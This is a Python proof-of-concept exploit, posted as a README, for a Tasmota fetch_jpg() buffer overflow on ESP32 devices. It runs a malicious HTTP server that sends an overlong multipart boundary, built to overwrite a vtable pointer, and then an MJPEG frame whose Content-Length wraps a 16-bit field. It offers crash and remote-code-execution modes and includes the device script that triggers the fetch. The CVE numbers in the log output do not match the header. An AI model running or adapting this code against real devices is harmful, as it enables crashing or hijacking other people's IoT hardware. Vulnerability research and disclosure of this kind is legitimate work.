README.md
Rendering markdown...
#!/usr/bin/env python3
"""
PoC: CVE-2026-38422
Target: Tasmota <= 15.3.0.3
File: tasmota/tasmota_xdrv_driver/xdrv_10_scripter.ino
Function: fetch_jpg()
Vulnerability:
Combined attack vector using both overflow conditions in fetch_jpg():
1. Initial connection (case 0) — boundary overflow via strcpy()
2. Frame fetch (case 2) — uint16_t wraparound via Content-Length
The combination of both in a single attack session maximizes
heap corruption and increases RCE probability on ESP32.
Buffer layout on ESP32 heap (typical):
    struct JPG_TASK {              Offset  Size
        char       boundary[40];   +0x00   40
        bool       draw;           +0x28   1
        uint8_t    scale;          +0x29   1
        uint16_t   xp;             +0x2A   2
        uint16_t   yp;             +0x2C   2
        WiFiClient stream;         +0x2E   ~80   ← vtable ptr at +0x2E
        HTTPClient http;           +0x7E   ~200  ← vtable ptr at +0x7E
    } jpg_task;
Overwriting WiFiClient vtable ptr with controlled value → RCE
when any virtual method (read, write, connect) is called.
Attack Flow:
Phase 1: Send initial response with long boundary (overflow boundary[40])
Phase 2: Send MJPEG frame with Content-Length > 65535 (uint16_t wrap)
Result: Heap corruption → potential RCE / guaranteed DoS
Author: Saidakbarxon Maxsudxonov
CVE: CVE-2026-38422
"""
import socket
import argparse
import struct
import time
from datetime import datetime
# Startup banner; printed once by main() before argument parsing.
BANNER = """
╔══════════════════════════════════════════════════════╗
║ CVE-2026-38422 PoC — Tasmota fetch_jpg() ║
║ Combined Buffer Overflow → RCE / DoS ║
║ Affected: Tasmota <= 15.3.0.3 (ESP32) ║
╚══════════════════════════════════════════════════════╝
"""
def log(msg, level="*"):
    """Print ``msg`` to stdout as ``[HH:MM:SS] [level] msg``.

    Args:
        msg: Text to print.
        level: Short tag shown in the second bracket (default ``"*"``).
    """
    stamp = f"{datetime.now():%H:%M:%S}"
    print("[{}] [{}] {}".format(stamp, level, msg))
# ESP32 Xtensa architecture constants
# NOTE(review): neither constant is referenced anywhere else in the visible
# source; they appear to be informational only.
ESP32_HEAP_BASE = 0x3FFB0000 # Typical DRAM heap start
WIFI_CLIENT_VTABLE = 0x400D1234 # Placeholder — requires firmware analysis
def build_phase1_boundary(fake_vtable=None):
    """
    Build the 50-byte Phase 1 boundary payload.

    Byte layout of the returned value (slot names follow the struct sketch
    in the module docstring):
        [0..38]   39 x b"A"
        [39]      NUL byte
        [40..45]  six bytes for the draw / scale / xp / yp slots
        [46..49]  four bytes for the WiFiClient vtable slot

    Args:
        fake_vtable: ``None`` selects the filler variant (b"B" * 6 followed
            by b"C" * 4). Any integer (including 0) selects the structured
            variant: draw=1, scale=1, xp=0, yp=0, then the integer packed as
            a little-endian unsigned 32-bit value.

    Returns:
        bytes: the payload.

    Raises:
        struct.error: if ``fake_vtable`` is given but does not fit in an
            unsigned 32-bit integer.
    """
    prefix = b"A" * 39 + b"\x00"
    if fake_vtable is None:
        return prefix + b"B" * 6 + b"C" * 4
    # "<" = little-endian, no padding: B(draw) B(scale) H(xp) H(yp) I(vtable)
    return prefix + struct.pack("<BBHHI", 1, 1, 0, 0, fake_vtable)
def make_initial_response(boundary_payload):
    """Return the raw HTTP response (bytes) served for fetch_jpg case 0.

    The response is a ``200 OK`` with a ``multipart/x-mixed-replace``
    Content-Type whose ``boundary=`` parameter carries ``boundary_payload``.
    Latin-1 is used for both decode and encode so every byte value 0-255 in
    the payload round-trips unchanged into the header.

    Args:
        boundary_payload: bytes placed verbatim after ``boundary=``.

    Returns:
        bytes: status line, two headers and the terminating blank line.
    """
    boundary_text = boundary_payload.decode('latin-1', errors='replace')
    header_lines = [
        "HTTP/1.1 200 OK",
        "Content-Type: multipart/x-mixed-replace; boundary=" + boundary_text,
        "Connection: keep-alive",
        "",  # blank line that ends the header section
        "",
    ]
    return "\r\n".join(header_lines).encode('latin-1', errors='replace')
def make_overflow_frame(content_length=70000):
    """
    Build one MJPEG part whose Content-Length header is ``content_length``.

    The part consists of a fixed ``--BOUNDARY_OVERFLOW_PAYLOAD`` delimiter
    line, ``Content-Type`` / ``Content-Length`` headers, a blank line, and a
    body of exactly ``content_length`` bytes (for ``content_length >= 0``).

    The body is a JPEG-shaped blob: SOI + APP0/JFIF header (20 bytes),
    b"\\x41" padding, and the 2-byte EOI marker. Padding is sized so that the
    EOI marker is the last two bytes of the body whenever
    ``content_length >= 22``; shorter bodies are simply truncated.

    Args:
        content_length: value advertised in the header and size of the body.
            Example from the original notes: 70000 -> 70000 & 0xFFFF = 4464.

    Returns:
        tuple[bytes, int]: ``(frame, wrapped)`` where ``wrapped`` is
        ``content_length & 0xFFFF`` (the value a 16-bit unsigned field would
        hold).
    """
    wrapped = content_length & 0xFFFF

    jpeg_head = b"".join((
        b'\xff\xd8',                      # JPEG SOI
        b'\xff\xe0\x00\x10',              # APP0
        b'JFIF\x00\x01\x01\x00',
        b'\x00\x01\x00\x01\x00\x00',
    ))
    jpeg_eoi = b'\xff\xd9'                # JPEG EOI

    # Reserve room for the EOI marker; the previous "- 20" sizing made the
    # body two bytes too long, so the final slice always cut the marker off.
    pad_len = max(0, content_length - len(jpeg_head) - len(jpeg_eoi))
    jpeg_payload = (jpeg_head + b'\x41' * pad_len + jpeg_eoi)[:content_length]

    part_header = (
        f"--BOUNDARY_OVERFLOW_PAYLOAD\r\n"
        f"Content-Type: image/jpeg\r\n"
        f"Content-Length: {content_length}\r\n"
        f"\r\n"
    ).encode()
    return part_header + jpeg_payload, wrapped
def handle_client(conn, addr, mode, vtable):
    """Serve one accepted connection: read the request, send both phases.

    Sequence: read up to 2048 bytes of request and log its first line, send
    the Phase 1 response built from ``build_phase1_boundary()``, sleep 1 s,
    send the Phase 2 frame from ``make_overflow_frame()``, sleep 3 s. The
    connection is always closed on exit.

    Args:
        conn: connected socket returned by ``accept()``.
        addr: ``(host, port)`` tuple of the peer; used for logging only.
        mode: ``"rce"`` or ``"dos"``. The structured payload is used only
            when ``mode == "rce"`` and ``vtable`` is non-empty.
        vtable: hexadecimal address string (e.g. ``"0x3FFB1000"``) or None.

    Errors are logged rather than raised: ``BrokenPipeError`` is reported as
    a peer disconnect, any other ``Exception`` (including a malformed
    ``vtable`` string) as a generic error.
    """
    log(f"Tasmota connected from {addr[0]}:{addr[1]}", "+")
    try:
        # Receive HTTP request
        req = conn.recv(2048).decode('utf-8', errors='ignore')
        if req:
            log(f"HTTP request: {req.splitlines()[0]}")

        log("=" * 52)
        log("PHASE 1: Boundary strcpy() overflow (CVE-2026-38426)")
        log("=" * 52)

        # Build overflow payload
        if mode == "rce" and vtable:
            vtable_addr = int(vtable, 16)
            boundary_payload = build_phase1_boundary(fake_vtable=vtable_addr)
            log(f"Fake vtable address: 0x{vtable_addr:08X}", "!")
        else:
            boundary_payload = build_phase1_boundary()
        log(f"Boundary payload: {len(boundary_payload)} bytes", "!")
        log(f"Overflow: {max(0, len(boundary_payload)-39)} bytes beyond boundary[40]", "!")

        # Send Phase 1. sendall() loops until every byte is written;
        # plain send() may return after a partial write.
        response = make_initial_response(boundary_payload)
        conn.sendall(response)
        log("Phase 1 sent — boundary[40] overflowed via strcpy()", "!")
        time.sleep(1)

        log("=" * 52)
        log("PHASE 2: uint16_t wraparound (CVE-2026-38427)")
        log("=" * 52)
        content_length = 70000
        frame, wrapped = make_overflow_frame(content_length)
        log(f"Content-Length header: {content_length}", "!")
        # Derived from content_length so the message cannot drift from the
        # value actually sent.
        log(f"uint16_t({content_length}) = {wrapped} bytes allocated", "!")
        log(f"Unread stream bytes: {content_length - wrapped}", "!")
        conn.sendall(frame)
        log("Phase 2 sent — heap/stream corruption triggered", "!")
        log("Expected result: Guru Meditation Error / device reboot", "!")
        time.sleep(3)
    except BrokenPipeError:
        log("Device disconnected — likely crashed! ✓", "+")
    except Exception as e:
        log(f"Error: {e}", "-")
    finally:
        conn.close()
        log("Session complete")
def main():
    """Parse CLI options, print usage hints, and serve connections forever.

    Options: ``--ip`` (bind address, default 0.0.0.0), ``--port`` (default
    8887), ``--mode`` (``dos`` or ``rce``), ``--vtable`` (hex address string
    passed through to ``handle_client``).

    Connections are handled one at a time in the accept loop. Ctrl-C stops
    the loop; the listening socket is closed on every exit path, including
    a failing ``bind()`` or ``listen()``.
    """
    print(BANNER)
    parser = argparse.ArgumentParser(description="CVE-2026-38422 Combined PoC")
    parser.add_argument("--ip", default="0.0.0.0")
    parser.add_argument("--port", type=int, default=8887)
    parser.add_argument("--mode", choices=["dos", "rce"], default="dos",
                        help="dos=crash only, rce=attempt vtable overwrite")
    parser.add_argument("--vtable", type=str, default=None,
                        help="Fake vtable address for RCE (e.g. 0x3FFB1000)")
    args = parser.parse_args()

    log("CVE-2026-38422 — Combined Attack PoC", "+")
    log(f"Mode: {args.mode.upper()}")
    log(f"Listening: {args.ip}:{args.port}")
    log("─" * 54)
    log("Attack phases:")
    log(" Phase 1: strcpy(boundary[40]) → overflow (CVE-2026-38426)")
    log(" Phase 2: uint16_t Content-Length → wraparound (CVE-2026-38427)")
    log("─" * 54)
    log("Tasmota script to trigger:")
    log(" >D")
    log(" >B")
    log(f" fetchjp(YOUR_IP:{args.port}/stream,0,0,1)")
    log(" >1")
    log(" =fetchjp(2,0,0,1)")
    log("─" * 54)

    # The context manager closes the socket even if bind()/listen() raises,
    # which the previous try/finally (entered only after listen) did not.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server:
        server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        server.bind((args.ip, args.port))
        server.listen(5)
        log("Waiting for Tasmota device...", "*")
        try:
            while True:
                conn, addr = server.accept()
                handle_client(conn, addr, args.mode, args.vtable)
        except KeyboardInterrupt:
            log("Stopped")


if __name__ == "__main__":
    main()